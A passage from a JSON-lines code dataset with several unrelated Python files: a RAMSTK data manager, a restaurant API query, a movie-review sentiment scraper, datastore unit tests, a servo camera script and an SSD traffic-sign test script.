identifier=_node_id,\n parent=self._root,\n data={'usage_profile': _mission})\n self.last_id['mission'] = _mission.mission_id\n pub.sendMessage(\n \"succeed_insert_usage_profile\",\n node_id=_node_id,\n tree=self.tree,\n )\n except DataAccessError as _error:\n pub.sendMessage(\n 'do_log_debug',\n logger_name='DEBUG',\n message=_error.msg,\n )\n pub.sendMessage(\n \"fail_insert_usage_profile\",\n error_message=_error.msg,\n )\n\n def _do_insert_mission_phase(self, mission_id: int) -> None:\n \"\"\"Add a new mission phase for mission ID.\n\n :param mission_id: the mission ID to add the new mission phase.\n :return: None\n :rtype: None\n \"\"\"\n try:\n _last_id = self.dao.get_last_id('ramstk_mission_phase', 'phase_id')\n _phase = RAMSTKMissionPhase()\n _phase.mission_id = mission_id\n _phase.phase_id = _last_id + 1\n\n self.dao.do_insert(_phase)\n\n _node_id = '{0:d}.{1:d}'.format(mission_id, _phase.phase_id)\n self.tree.create_node(tag='mission_phase',\n identifier=_node_id,\n parent=str(mission_id),\n data={'usage_profile': _phase})\n self.last_id['mission_phase'] = _phase.phase_id\n pub.sendMessage(\n 'succeed_insert_usage_profile',\n node_id=_node_id,\n tree=self.tree,\n )\n except DataAccessError as _error:\n pub.sendMessage(\n 'do_log_debug',\n logger_name='DEBUG',\n message=_error.msg,\n )\n pub.sendMessage(\n \"fail_insert_usage_profile\",\n error_message=_error.msg,\n )\n\n def _do_set_attributes(self, node_id: List, package: Dict) -> None:\n \"\"\"Set the attributes of the record associated with the Node ID.\n\n :param node_id: the ID of the record whose attributes are to be set.\n :param package: the key:value for the attribute being updated.\n :return: None\n :rtype: None\n \"\"\"\n [[_key, _value]] = package.items()\n\n try:\n _attributes = self.do_select(\n node_id[0], table='usage_profile').get_attributes()\n if _key in _attributes:\n _attributes[_key] = _value\n\n _level = len(node_id[0].split('.'))\n for _attribute in {\n 1: ['revision_id', 'mission_id'],\n 2: ['mission_id', 'phase_id'],\n 3: ['phase_id', 'environment_id'],\n }[_level]:\n _attributes.pop(_attribute)\n\n self.do_select(\n 
node_id[0],\n table='usage_profile').set_attributes(_attributes)\n\n except (AttributeError, TypeError) as _error:\n pub.sendMessage(\n 'do_log_debug',\n logger_name='DEBUG',\n message=_error,\n )\n pub.sendMessage(\n 'fail_set_usage_profile_attributes',\n node_id=node_id[0],\n )\n\n def _do_set_all_attributes(self, attributes: Dict[str, Any],\n node_id: str) -> None:\n \"\"\"Set all the attributes of the record associated with the Module ID.\n\n This is a helper function to set a group of attributes in a single\n call. Used mainly by the AnalysisManager.\n\n :param attributes: the aggregate attributes dict for the revision.\n :param node_id: the usage profile ID if the attribute being set\n is a usage profile (mission, mission phase, or environment)\n attribute.\n :return: None\n :rtype: None\n \"\"\"\n for _key in attributes:\n self._do_set_attributes(node_id=[node_id, ''],\n package={_key: attributes[_key]})\n","sub_path":"src/ramstk/controllers/usage_profile/datamanager.py","file_name":"datamanager.py","file_ext":"py","file_size_in_byte":14514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"608046926","text":"import os\n\nimport pandas as pd\n\nfrom . import load\n\n\ndef construct_experiments_df(experiments_path):\n experiments_path = os.path.abspath(experiments_path)\n experiments_path_elems = [os.path.join(experiments_path, elem)\n for elem in os.listdir(experiments_path)]\n experiment_paths = [elem for elem in experiments_path_elems\n if os.path.isdir(elem) and is_experiment_dir(elem)]\n\n experiment_IDs = [os.path.basename(experiment_path)\n for experiment_path in experiment_paths]\n\n rows = [construct_experiment_row(experiment_path)\n for experiment_path in experiment_paths]\n\n return pd.DataFrame(data=rows, index=experiment_IDs)\n\n\ndef construct_experiment_row(experiment_path):\n json_names, json_files = zip(*[(\"\".join(elem.split(\".\")[:-1]), elem)\n for elem in os.listdir(experiment_path)\n if elem.endswith(\".json\")])\n json_paths = [os.path.join(experiment_path, json_file) for json_file in json_files]\n\n json_dicts = [load.open_json(json_path) for json_path in json_paths]\n\n experiment_row = {}\n for json_dict in json_dicts:\n experiment_row.update(json_dict)\n\n for json_name, json_path in zip(json_names, json_paths):\n experiment_row[json_name + \"_json\"] = json_path\n\n return experiment_row\n\n\ndef is_experiment_dir(dir):\n \"\"\"quick and dirty check\"\"\"\n return any([elem.endswith(\".json\") for elem in os.listdir(dir)])\n\n\ndef reconstruct_from_row(experiment_row, experiment_type=\"optimization\"):\n\n if experiment_type not in [\"optimization\", \"critfinder\"]:\n raise NotImplementedError(\"experiment_type {} not understood\"\n .format(experiment_type))\n\n if experiment_type == \"critfinder\":\n experiment_json_path = experiment_row.finder_json\n optimization_path = experiment_row.optimization_path\n optimization_row = pd.Series(construct_experiment_row(optimization_path))\n else:\n experiment_json_path = experiment_row.optimizer_json\n optimization_row = experiment_row\n\n data_json_path = optimization_row.data_json\n network_json_path = optimization_row.network_json\n\n data, network, experiment = load.from_paths(\n data_json_path, network_json_path, experiment_json_path,\n experiment_type=experiment_type)\n\n return data, network, 
experiment\n","sub_path":"critfinder/utils/dataframes.py","file_name":"dataframes.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"256959275","text":"import json\nimport requests\nimport pprint\nimport collections as cl\n#Function that fetches restaurant information for a food (Gurunavi API)\n#Args:    fName: name of the food\n#         fLat : latitude of the current location\n#         fLon : longitude of the current location\n#Returns: restaurant information\ndef getFoodsInfo(fName,fLat,fLon):\n    url = \"https://api.gnavi.co.jp/RestSearchAPI/v3/\"\n\n    params={}\n    params[\"keyid\"] = \"\"\n    params[\"freeword\"] = fName\n    params[\"latitude\"] = fLat\n    params[\"longitude\"] = fLon\n\n    #range = radius of the search area (1-5); find the smallest radius that returns 10 or more hits\n    for i in range(1,6):\n        params[\"range\"] = i\n        result = requests.get(url, params)\n        if(countHit(result.json())>=10):\n            break\n\n    print(\"range:%d\" % i)\n    return result.json() \n\n#Function that counts the number of hits. Also handles error responses.\n#Args:    restInfo: restaurant information returned by the Gurunavi API\n#Returns: number of hits\ndef countHit(restInfo): \n    return restInfo.get('total_hit_count', 0)\n\"\"\"\ndef countHitOld(restInfo): \n    try:\n        if(restInfo['rest']):\n            hit=len(restInfo['rest'])\n        else:\n            hit=0\n    except:\n        #an error occurs when restInfo['rest'] cannot be read\n        hit=0\n        #print(restInfo['error'][0]['code'])print(restInfo['error'][0]['message'])\n        \n    return hit\"\"\"\n\n#Print the fetched results\n#Args:    restInfo: restaurant information returned by the Gurunavi API\n#Returns: void\ndef printFoodsInfo(restInfo):\n    hitCnt=countHit(restInfo)\n    for i in range(hitCnt):\n        if(restInfo['rest'][i]['address']):\n            print(\"Restaurant info: %d of %d\" % (i+1,hitCnt) )\n            print(restInfo['rest'][i]['address'])\n            print(restInfo['rest'][i]['name'])\n            \n\"\"\" \n    #print(restInfo['rest'][i]['name_kana'])\n    #print(restInfo['rest'][i]['opentime'])\n    #print(restInfo['rest'][i]['image_url']['shop_image1'])\n    #print(restInfo['rest'][i]['code']['areaname'])\n    print(restInfo['rest'][i]['code']['category_name_l'][:2])\n    print(\" ----------------------------------------- \")\n\"\"\"\nif __name__=='__main__':\n    data=getFoodsInfo('たこ焼き',34.986086, 135.759089)\n    printFoodsInfo(data)","sub_path":"check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"40392855","text":"import requests # request a webpage\nimport bs4 # search tags in a HTML page\nfrom selenium import webdriver # download webpage after javascript rendering\n\nfrom nltk.tokenize import word_tokenize # separate text into words\nfrom nltk.corpus import stopwords # remove stopwords from text\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer # sentiment analysis\n\nfrom utils import print_progress_bar # display progress bar in console\n\n\n# STEP 0\ndef input_movie_name():\n    \"\"\"\n    Get movie name from user input\n    \"\"\"\n    movie_name = input('\\nEnter a movie to analyse people\\'s sentiment about it: ')\n    print()\n    return movie_name, len(movie_name) == 0\n\n\n# STEP 1\ndef search_movie_url(movie_name, base_url):\n    \"\"\"\n    Search movie URL in website\n    Parameters:\n        movie_name - Required : movie name inputted by user (Str)\n        base_url - Required : website base URL (Str)\n    Returns:\n        movie_url : movie URL in website (Str)\n        found : boolean indicating whether the movie was found (Bool)\n    \"\"\"\n    # Request search web page\n    search_url = base_url + '/search?query=' + movie_name.replace(' ', '%20')\n    print('Searching movie...')\n    res = requests.get(search_url)\n    res.raise_for_status()\n    search_soup = bs4.BeautifulSoup(res.text, features='html.parser')\n\n    # Search movie\n    
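# Hedged aside (illustration only, not part of the original flow): the CSS\n    # selector used on the next line is roughly equivalent to filtering anchor\n    # tags by their data attribute with standard bs4 calls; 'movie_links' is a\n    # hypothetical name used only for this sketch:\n    #   movie_links = [a for a in search_soup.find_all('a')\n    #                  if a.get('data-media-type') == 'movie']\n    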
movie_search_results = search_soup.select('.flex a[data-media-type=\"movie\"]')\n    if len(movie_search_results) == 0:\n        print(\"Movie not found\")\n        return '', False\n    print('Movie found')\n\n    # Get movie URL\n    movie_result = movie_search_results[0]\n    movie_url = base_url + movie_result.get('href')\n\n    return movie_url, True\n\n\n# STEP 2\ndef print_movie_data(movie_url):\n    \"\"\"\n    Get movie webpage and print movie data\n    Parameters:\n        movie_url - Required : movie URL (Str)\n    \"\"\"\n    # Request movie HTML page\n    print('Accessing movie webpage...\\n')\n    res = requests.get(movie_url)\n    res.raise_for_status()\n    movie_soup = bs4.BeautifulSoup(res.text, features='html.parser')\n\n    # Print some movie information\n    title_tag = movie_soup.select('.title span a h2')[0]\n    print('Movie title: ' + title_tag.getText())\n    date_tag = movie_soup.select('.title span .release_date')[0]\n    print('Release date: ' + date_tag.getText().replace('(','').replace(')',''))\n    actors_tag = movie_soup.select('.top_billed ol li[class=\"card\"]')\n    print('Main actors:')\n    for i in range(min(3, len(actors_tag))):\n        descendants = list(actors_tag[i].descendants)\n        name = descendants[8]\n        character = descendants[11]\n        print(' - ' + name + ': ' + character)\n\n\n# STEP 3\ndef get_movie_reviews_webpage(movie_url):\n    \"\"\"\n    Get HTML tags (div) of all reviews\n    Parameters:\n        movie_url - Required : movie URL (Str)\n    Returns:\n        reviews_tags : HTML tags containing reviews (List of bs4.element.Tag)\n    \"\"\"\n    # Get movie reviews webpage\n    reviews_url = movie_url + '/reviews'\n    print('\\nAccessing movie reviews...')\n    res = requests.get(reviews_url)\n    res.raise_for_status()\n    # Retrieve HTML tags\n    reviews_soup = bs4.BeautifulSoup(res.text, features='html.parser')\n    reviews_tags = reviews_soup.select('.review_container .content .inner_content .card .teaser')\n    return reviews_tags\n\n\n# STEP 4\ndef check_reviews_number(reviews_tags):\n    \"\"\"\n    Check that there is a positive number of reviews\n    Parameters:\n        reviews_tags - Required : HTML tags containing reviews (List of bs4.element.Tag)\n    Returns:\n        positive : boolean indicating whether there is a positive number of reviews (Bool)\n    \"\"\"\n    if len(reviews_tags) == 0:\n        print('No review found for this movie.')\n        return False\n    return True\n\n\n# STEP 5\ndef get_reviews_text(reviews_tags, base_url):\n    \"\"\"\n    Get text of reviews in their HTML tags\n    Parameters:\n        reviews_tags - Required : HTML tags containing reviews (List of bs4.element.Tag)\n        base_url - Required : website base URL (Str)\n    Returns:\n        reviews : list containing text of each review (List of Str)\n    \"\"\"\n    # We may need selenium to retrieve some reviews\n    options = webdriver.ChromeOptions()\n    options.add_argument('headless')\n    browser = webdriver.Chrome(options=options)\n\n    reviews = []\n    nb_reviews = len(reviews_tags)\n    print('Analysis over ' + str(nb_reviews) + ' reviews')\n    print_progress_bar(0, nb_reviews, prefix='Downloading reviews:', suffix='complete')\n\n    for idx, tag in enumerate(reviews_tags):\n        full_text = True\n        text = ''\n        # Check if the full review is displayed, or just a preview\n        for desc in tag.descendants:\n            if type(desc) == bs4.element.Tag and desc.name == 'a':\n                # If not full, get page of full review with selenium\n                full_text = False\n                review_url = base_url + desc.get('href')\n                browser.get(review_url)\n                # Get div containing paragraphs of review\n                paragraphs_div = browser.execute_script(\"return document.getElementsByClassName('content column pad')\")[0]\n                div_children = paragraphs_div.find_elements_by_css_selector('*')\n                # Concatenate paragraphs\n                for p in div_children:\n                    if p.tag_name == 'p':\n                        text = text + p.text + ' '\n                break\n        if full_text:\n            # If review is already full\n            for desc in tag.descendants:\n                # Retrieve all paragraphs of review and concatenate them\n                if type(desc) == bs4.element.Tag and desc.name == 'p':\n                    text = text + desc.getText() + ' '\n        # Add this review to the reviews list\n        reviews.append(text.strip())\n        print_progress_bar(idx+1, nb_reviews, prefix='Downloading reviews:', suffix='complete')\n\n    return reviews\n\n\n# STEP 6\ndef clean_reviews_text(reviews):\n    \"\"\"\n    Clean reviews text data\n    Parameters:\n        reviews - Required : list containing text of each review (List of Str)\n    Returns:\n        reviews : modified list containing cleaned text of each review (List of Str)\n    \"\"\"\n    nb_reviews = len(reviews)\n    print_progress_bar(0, nb_reviews, prefix='Cleaning data: ', suffix='complete')\n    # Clean text data with NLTK library\n    for idx, review in enumerate(reviews):\n        print_progress_bar(idx+1, nb_reviews, prefix='Cleaning data: ', suffix='complete')\n        tokens = word_tokenize(review)\n        # Remove all tokens that are not alphabetic\n        review = [word for word in tokens if word.isalpha()]\n        # Filter out stopwords\n        stop_words = set(stopwords.words('english'))\n        review = [w for w in review if not w in stop_words]\n        # Store the cleaned text back so the modified list is actually returned\n        reviews[idx] = ' '.join(review)\n    return reviews\n\n\n# STEP 7\ndef analyse_reviews_sentiment(reviews):\n    \"\"\"\n    Make sentiment analysis over reviews text data\n    Parameters:\n        reviews - Required : list containing text of each review (List of Str)\n    Returns:\n        sentiment_score : score in which positive values mean positive global sentiment\n                          and negative values mean negative global sentiment\n    \"\"\"\n    nb_reviews = len(reviews)\n    print_progress_bar(0, nb_reviews, prefix='Analyzing reviews: ', suffix='complete')\n    # Analyse sentiment with a lexicon\n    sid = SentimentIntensityAnalyzer()\n    sentiment_score = 0\n    for idx, review in enumerate(reviews):\n        print_progress_bar(idx+1, nb_reviews, prefix='Analyzing reviews: ', suffix='complete')\n        ss = sid.polarity_scores(review)\n        sentiment_score += ss['pos'] - ss['neg']\n    print('\\n')\n    return sentiment_score\n\n\n# STEP 8\ndef print_results(sentiment_score, threshold):\n    \"\"\"\n    Print result of reviews sentiment analysis according to the sentiment score\n    Parameters:\n        sentiment_score - Required : sentiment score computed over reviews text (Float)\n        threshold - Required : threshold delimiting positive/negative scores\n                               from neutral score (Float)\n    \"\"\"\n    if sentiment_score > threshold:\n        print('Global sentiment about this movie is positive')\n        print(' --------')\n    elif sentiment_score < -threshold:\n        print('Global sentiment about this movie is negative')\n        print(' --------')\n    else:\n        print('Global sentiment about this movie is neutral')\n        print(' -------')\n","sub_path":"sentiment_analysis/steps.py","file_name":"steps.py","file_ext":"py","file_size_in_byte":8549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"376868282","text":"\"\"\"Test reading and writing of program data.\"\"\"\n\nimport unittest\n\nfrom api import Api\nfrom core import *\nfrom cron import Cron\nimport unit_test_helper\n\n\nclass PdTestCase(unit_test_helper.PopulatedInconsistentTestCase):\n\n    ### testing functions ###\n\n    # See: http://docs.python.org/2/library/unittest.html#assert-methods\n\n    def test_get_user_by_key(self):\n        \"\"\"An example of a strongly consistent query.\"\"\"\n        fetched_student = 
User.get_by_id(self.student.id)\n self.assertEqual(self.student, fetched_student)\n\n @unittest.expectedFailure\n def test_get_user_by_query(self):\n \"\"\"An example of an eventually consistent query.\"\"\"\n # A newly-created student won't be returned by a property-based query.\n new_student = User.create(user_type='student')\n new_student.put()\n fetched_student = User.all().filter('id =', new_student.id).get()\n self.assertEqual(new_student, fetched_student)\n\n def test_pd_variables_overwrite(self):\n \"\"\"A second pd with the same variable should delete the first.\"\"\"\n\n pd1 = self.student_api.create('pd', {\n 'variable': 'condition',\n 'value': 'first value',\n 'program': self.program.id,\n 'scope': self.student.id,\n })\n\n # In the process of creating this pd, the first should be deleted.\n pd2 = self.student_api.create('pd', {\n 'variable': 'condition',\n 'value': 'second value',\n 'program': self.program.id,\n 'scope': self.student.id,\n })\n \n # Re-fetch the original so we can see if it was correctly deleted.\n pd1 = Pd.get_by_id(pd1.id)\n self.assertTrue(pd1.deleted, \"Original pd not deleted.\")\n\n def test_pd_duplicates_overwrite(self):\n \"\"\"Even if there are duplicate pds, writing new ones should succeed.\"\"\"\n # Create w/o the api to intentionally create duplicates\n pd_id1 = 'Pd_1.' + self.student.id\n pd_id2 = 'Pd_2.' + self.student.id\n pd1 = Pd(key_name=pd_id1, id=pd_id1, parent=self.student,\n scope=self.student.id, program=self.program.id,\n variable='condition', value='duplicate test', public=True)\n pd2 = Pd(key_name=pd_id2, id=pd_id2, parent=self.student,\n scope=self.student.id, program=self.program.id,\n variable='condition', value='duplicate test', public=True)\n db.put([pd1, pd2])\n\n # Prove that there are duplicates.\n duplicates = self.student_api.get('pd', {}, ancestor=self.student)\n self.assertEquals(len(duplicates), 2)\n\n # Write a pd the normal way.\n pd3 = self.student_api.create('pd', {\n 'variable': 'condition',\n 'value': 'non-duplicate',\n 'program': self.program.id,\n 'scope': self.student.id,\n })\n\n # Only the new one should be present.\n non_duplicate = self.student_api.get('pd', {}, ancestor=self.student)\n self.assertEquals(len(non_duplicate), 1)\n self.assertEquals(non_duplicate[0].value, 'non-duplicate')\n\n def test_excessive_duplication(self):\n \"\"\"Writing over 100 duplicates raises an exception.\"\"\"\n # Create w/o the api to intentionally create duplicates\n duplicates = []\n for x in range(100):\n pd_id = 'Pd_{}.{}'.format(x, self.student.id)\n pd = Pd(key_name=pd_id, id=pd_id, parent=self.student,\n scope=self.student.id, program=self.program.id,\n variable='condition', value='duplicate test', public=True)\n duplicates.append(pd)\n db.put(duplicates)\n\n # Prove that there are duplicates.\n duplicates = self.student_api.get('pd', {}, ancestor=self.student)\n self.assertEquals(len(duplicates), 100)\n\n # Attempt to delete the excessive duplicates, expecting an exception.\n with self.assertRaises(Exception):\n pd_id = 'Pd_101.{}'.format(self.student.id)\n pd = Pd(key_name=pd_id, id=pd_id, parent=self.student,\n scope=self.student.id, program=self.program.id,\n variable='condition', value='non-duplicate', public=True)\n Pd.delete_previous_versions(pd, self.student)\n\n def test_batch_put_pd(self):\n params = {\n 'pd_batch': [{'variable': 's2__toi_1', 'value': 1},\n {'variable': 's2__toi_2', 'value': 1},\n {'variable': 's2__toi_3', 'value': 1},\n {'variable': 's2__toi_4', 'value': 1},\n {'variable': 's2__toi_5', 'value': 
1},\n {'variable': 's2__toi_6', 'value': 1},\n {'variable': 's2__toi_7', 'value': 1},\n {'variable': 's2__toi_8', 'value': 1},\n {'variable': 's2__toi_9', 'value': 1},\n {'variable': 's2__toi_10', 'value': 1}],\n 'activity': self.student_activities[0].id,\n 'activity_ordinal': 1,\n 'program': self.program.id,\n 'scope': self.student.id,\n 'is_test': False,\n }\n self.student_api.batch_put_pd(params)\n\n # We should get all the data back, using a strongly consistent\n # ancestor query.\n results = Pd.all().ancestor(self.student).fetch(10)\n self.assertEqual(len(results), 10)\n for pd in results:\n self.assertTrue(isinstance(pd, Pd))\n\n def test_get_by_ancestor(self):\n \"\"\"Setting ancestor in api.get() should be strongly consistent.\"\"\"\n self.student_api.create('pd', {\n 'variable': 'consent',\n 'value': 'true',\n 'activity': self.student_activities[0].id,\n 'activity_ordinal': 1,\n 'program': self.program.id,\n 'scope': self.student.id,\n })\n\n inconsistent_results = self.student_api.get(\n 'pd', {'variable': 'consent'})\n consistent_results = self.student_api.get(\n 'pd', {'variable': 'consent'}, ancestor=self.student)\n\n self.assertEquals(len(inconsistent_results), 0)\n self.assertEquals(len(consistent_results), 1)\n\n def test_progress_pds_never_decrease_in_value(self):\n \"\"\"Progress pds lower in value than existing ones get written as\n deleted.\"\"\"\n\n kw = {\n 'variable': 's1__progress',\n 'activity': self.student_activities[0].id,\n 'activity_ordinal': 1,\n 'program': self.program.id,\n 'scope': self.student.id,\n }\n\n self.student_api.create('pd', dict(kw, **{'value': '50'}))\n\n # A pd in another program, or with a different variable shouldn't cause\n # any conflict.\n self.student_api.create('pd', dict(kw, **{'variable': 's2__progress',\n 'value': '100'}))\n self.student_api.create('pd', dict(kw, **{'program': 'fake_program',\n 'value': '100'}))\n\n # Putting a *higher* value should work.\n self.student_api.create('pd', dict(kw, **{'value': '70'}))\n higher_results = self.student_api.get(\n 'pd', {'variable': 's1__progress'}, ancestor=self.student)\n self.assertEquals(higher_results[0].value, '70')\n\n # Putting a *lower* value should not work.\n self.student_api.create('pd', dict(kw, **{'value': '60'}))\n higher_results = self.student_api.get(\n 'pd', {'variable': 's1__progress'}, ancestor=self.student)\n self.assertNotEquals(higher_results[0].value, '60')\n\n # Full history should be availabe.\n all_pd = Pd.all().filter('variable =', 's1__progress') \\\n .filter('program =', self.program.id) \\\n .ancestor(self.student) \\\n .order('created') \\\n .fetch(4)\n\n self.assertTrue(all_pd[0].deleted)\n self.assertFalse(all_pd[1].deleted)\n self.assertTrue(all_pd[2].deleted)\n\n self.assertEquals(all_pd[0].value, '50')\n self.assertEquals(all_pd[1].value, '70')\n self.assertEquals(all_pd[2].value, '60')\n","sub_path":"unit_testing/test_pd.py","file_name":"test_pd.py","file_ext":"py","file_size_in_byte":8254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"236117376","text":"import numpy as np\nimport cv2 \nfrom adafruit_servokit import ServoKit\n\nprint(cv2.__version__)\ndispW=1920\ndispH=1080\n#Uncomment These next Two Line for Pi Camera\ncamSet='nvarguscamerasrc ! video/x-raw(memory:NVMM), width=3264, height=2464, format=NV12, framerate=21/1 ! nvvidconv ! video/x-raw, width='+str(dispW)+', height='+str(dispH)+', format=BGRx ! videoconvert ! video/x-raw, format=BGR ! 
appsink'\nname= 'Raz'\n#camSet='nvarguscamerasrc sensor-id=-0 ! video/x-raw(memory:NVMM), width=3264, height=2464, framerate=21/1, format=NV12 ! nvvidconv flip-method=2 ! video/x-raw, width=800, height=600, format=BGRx ! videoconvert ! video/x-raw, format=BGR ! appsink'\ncam= cv2.VideoCapture(camSet)\n#Or, if you have a WEB cam, uncomment the next line\n#(If it does not work, try setting to '1' instead of '0')\n#cam=cv2.VideoCaptur%e(0)\ni=1\nkit=ServoKit(channels=16)\n\ndef nothing(x):\n pass\n\ndef create_panTilt_trackbars():\n cv2.namedWindow('Trackbars')\n cv2.createTrackbar('Pan', 'Trackbars',90,180,nothing)\n cv2.createTrackbar('Tilt', 'Trackbars',90,180,nothing)\n cv2.moveWindow('Trackbars',1320,0)\n\ncreate_panTilt_trackbars()\n\n#Class camera for change position\nclass imxCamera:\n def __init__(self, pan , tilt):\n self.pan = pan\n self.tilt = tilt\n\n\n def changePosition(pan ,tilt):\n if pan > 180 or tilt > 180 or pan<0 or tilt<0:\n print(\"pan or tilt cannot be more than 180\")\n return 1\n kit.servo[0].angle = pan\n kit.servo[1].angle = tilt\n\n\nwhile True:\n pan = cv2.getTrackbarPos('Pan','Trackbars')\n tilt = cv2.getTrackbarPos('Tilt', 'Trackbars')\n ret, frame = cam.read()\n imxCamera.changePosition(pan,tilt)\n cv2.imshow('nanoCam',frame)\n\n if cv2.waitKey(1)==ord('p'):\n cv2.imwrite('/home/rami/Desktop/SmartCam/Pictures/known/'+str(i)+name+'.png',frame)\n i = i + 1\n if cv2.waitKey(1)==ord('q'):\n break\ncam.release()\ncv2.destroyAllWindows()\n","sub_path":"Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"363622683","text":"import argparse\nimport tensorflow as tf\nimport os\nimport sys\nimport numpy as np\nimport yaml\nfrom tqdm import tqdm\nfrom PIL import Image\nimport pickle\n\nfrom utils.trafficdata import createTraffBatchGenerator\nfrom utils.defaultboxes import generate_default_boxes\nfrom utils.boxutils import decode, computeNms\nfrom network.ssdnet import createSSD\nfrom network.ssdneteval import createSSD as createSSDEval\nfrom utils.imagevisualize import ImageVisualizer\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--data-dir', default='D:\\FAX\\MASTER\\LISADFG')\nparser.add_argument('--img-dir', default='TData2')\nparser.add_argument('--arch', default='ssd300')\nparser.add_argument('--num-examples', default=-1, type=int)\nparser.add_argument('--pretrained-type', default='specified')\nparser.add_argument('--checkpoint-dir', default='')\nparser.add_argument('--checkpoint-path', default=r\"D:\\FAX\\MASTER\\repo\\ssd_traffic_signs_detection\\checkpointsNewData\\ssd_epoch_70.h5\")\nparser.add_argument('--gpu-id', default='0')\n\nargs = parser.parse_args()\n\nos.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_id\n\nNUM_CLASSES = 247\nBATCH_SIZE = 1\n\ndef predict(ssd, imgs, default_boxes):\n confs, locs = ssd(imgs)\n\n\n confs = tf.squeeze(confs, 0)\n locs = tf.squeeze(locs, 0)\n\n confs = tf.math.softmax(confs, axis=-1)\n classes = tf.math.argmax(confs, axis=-1)\n scores = tf.math.reduce_max(confs, axis=-1)\n\n boxes = decode(default_boxes, locs)\n\n out_boxes = []\n out_labels = []\n out_scores = []\n\n for c in range(1, NUM_CLASSES):\n cls_scores = confs[:, c]\n\n score_idx = cls_scores > 0.6\n # cls_boxes = tf.boolean_mask(boxes, score_idx)\n # cls_scores = tf.boolean_mask(cls_scores, score_idx)\n cls_boxes = boxes[score_idx]\n cls_scores = cls_scores[score_idx]\n\n nms_idx = computeNms(cls_boxes, cls_scores, 0.45, 200)\n 
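# Hedged note (illustration only): computeNms is assumed to return the\n        # indices of the boxes kept after greedy non-max suppression; in\n        # pseudo-NumPy, with a hypothetical iou() helper, the idea is:\n        #   order = np.argsort(cls_scores)[::-1]\n        #   keep = []\n        #   while order.size > 0:\n        #       i, rest = order[0], order[1:]\n        #       keep.append(i)\n        #       order = rest[iou(cls_boxes[i], cls_boxes[rest]) <= 0.45]\n        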
cls_boxes = tf.gather(cls_boxes, nms_idx)\n cls_scores = tf.gather(cls_scores, nms_idx)\n cls_labels = [c] * cls_boxes.shape[0]\n\n out_boxes.append(cls_boxes)\n out_labels.extend(cls_labels)\n out_scores.append(cls_scores)\n\n out_boxes = tf.concat(out_boxes, axis=0)\n out_scores = tf.concat(out_scores, axis=0)\n\n boxes = tf.clip_by_value(out_boxes, 0.0, 1.0).numpy()\n classes = np.array(out_labels)\n scores = out_scores.numpy()\n\n return boxes, classes, scores\n\ndef test_net():\n # with open(r\"D:\\FAX\\MASTER\\LISADFG\\classToIds.p\", 'rb') as f:\n # dataLoad = pickle.load(f)\n\n with open('./config.yml') as f:\n cfg = yaml.load(f)\n\n try:\n config = cfg[args.arch.upper()]\n except AttributeError:\n raise ValueError('Unknown architecture: {}'.format(args.arch))\n\n default_boxes = generate_default_boxes(config)\n batch_generator, info = createTraffBatchGenerator(args.data_dir,\n args.img_dir,\n default_boxes,\n config['image_size'],\n BATCH_SIZE,\n args.num_examples,\n augmentation=True,\n mode='test')\n\n try:\n ssd, latestEpoch = createSSD(NUM_CLASSES, args.arch,\n args.pretrained_type,\n args.checkpoint_dir,\n args.checkpoint_path)\n\n print('Latest epoch: {}'.format(latestEpoch))\n\n except Exception as e:\n print(e)\n print('The program is exiting...')\n sys.exit()\n\n os.makedirs('outputsMergeData/images', exist_ok=True)\n os.makedirs('outputsMergeData/detects', exist_ok=True)\n visualizer = ImageVisualizer(info['idx_to_name'], save_dir='outputsMergeData/images')\n\n for i, (filename, imgs, gt_confs, gt_locs) in enumerate(\n tqdm(batch_generator, total=info['length'],\n desc='Testing...', unit='images')):\n\n boxes, classes, scores = predict(ssd, imgs, default_boxes)\n\n filename = filename.numpy()[0].decode()\n original_image = Image.open(\n os.path.join(args.data_dir, info['image_dir'], filename))\n boxes *= original_image.size * 2\n visualizer.save_image(\n original_image, boxes, classes, '{}.jpg'.format(filename))\n\n log_file = os.path.join('outputsMergeData/detects', '{}.txt')\n\n for cls, box, score in zip(classes, boxes, scores):\n cls_name = info['idx_to_name'][cls]\n with open(log_file.format(cls_name), 'a') as f:\n f.write('{} {} {} {} {} {}\\n'.format(\n filename,\n score,\n *[coord for coord in box]))\n","sub_path":"script/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"82826408","text":"from starter2 import *\nfrom collections import defaultdict\nimport scipy\nimport colors\n\nimport convex_hull_tools as CHT\nimport hair_dryer\nimport otherones\nreload(hair_dryer)\nimport looper2\nimport three_loopers_tenfour as TL4\nif 'this_simname' not in dir():\n if 0:\n new_simname = 'a001'\n other_simname = 'u301'\n this_simname = 'u401'\n #save='a001_all_particles.h5'\n save='/data/cb1/Projects/P19_CoreSimulations/CoreSets/a000/a001_all_particles.h5'\n if 0:\n new_simname = 'a002'\n other_simname = 'u302'\n this_simname = 'u402'\n save='/data/cb1/Projects/P19_CoreSimulations/CoreSets/a000/a002_all_particles.h5'\n if 1:\n new_simname = 'a003'\n other_simname = 'u303'\n this_simname = 'u403'\n #save='a003_all_particles.h5'\n save='/data/cb1/Projects/P19_CoreSimulations/CoreSets/a000/a003_all_particles.h5'\n boxname = 'box_of_masses_%s.h5'%new_simname\n this_looper = looper2.core_looper2( directory = dl.sims[other_simname], savefile_only_trackage=save)\n print('make ms, takes about 90 sec')\n ms = trackage.mini_scrubber(this_looper.tr, 0, 
